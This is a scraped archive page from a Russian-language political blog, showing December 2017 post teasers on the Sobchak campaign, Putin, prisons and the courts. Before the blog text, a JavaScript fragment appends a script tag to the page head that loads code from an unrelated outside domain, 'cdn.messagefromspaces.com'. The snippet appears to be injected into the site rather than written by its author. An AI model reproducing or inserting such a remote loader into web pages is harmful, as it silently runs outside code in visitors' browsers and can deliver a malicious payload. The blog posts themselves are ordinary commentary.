, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Архив за декабря, 2017

Что лучше, прийти на выборы или не ходить?

27 Дек

Предвыборная компания только начинается, но этот вопрос  становится более актуальным, чем все  выборы и дебаты по ним. Как поступить, каждый  для себя  решает сам.

Появление на избирательном  поле  Ксении Собчак,  давало мне надежду на то, что она сможет аккумулировать все проблемы, связанные с тем самовластием, тем нарушением законности, что творится в России, и аргументировано убедит  избирателей, как избежать  продолжения такой унизительной  жизни  на ближайшие шесть лет.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Почему Путин хорош, как Президент и никакой, как гарант Конституции?

24 Дек

Выступление Владимира Путина на пленарном заседании XVII съезда Всероссийской политической партии «Единая Россия» ещё раз подтвердило это. https://echo.msk.ru/blog/echomsk/2116176-echo/

Надо согласиться с тем, что ему, как Президенту России удалось обеспечить укрепление безопасности России, усилить её обороноспособность и повысить влияние в мире.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Почему выступление Ксении Собчак на съезде партии «Гражданская инициатива» меня разочаровало?

23 Дек

Программа Ксении Собчак   не всем участникам съезда оказалась доступной, поэтому о ней могу судить только по представлению положений её платформы на съезде https://sobchakprotivvseh.ru/blog/207

Прежде всего, зачем было спрашивать сторонников: «А против чего вы?»,  если  не делать анализ тому, о чём высказались россияне, пожелавшие не быть простыми наблюдателями, а участниками политической деятельности?
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Что не так в тюремной системе России?

19 Дек

В обществе на протяжении длительного времени обсуждаются проблемы, существующие в тюремной системе России http://antipytki.ru/2017/07/20/penitentsiarnye-sistemy-i-penitentsiarnye-reformy-v-zarubezhnyh-stranah/
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Почему правосудие в России осуществляется как остановившиеся часы?

17 Дек

Как практикующий 45 лет юрист, могу утверждать, что иногда законные и обоснованные решения судьями всё-таки принимаются. Например, более десяти раз по надуманным основаниям следователи пытались не допустить меня к участию в уголовном деле и только дважды судьи признавали такие действия, бездействия и решения следователя незаконными и необоснованными.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки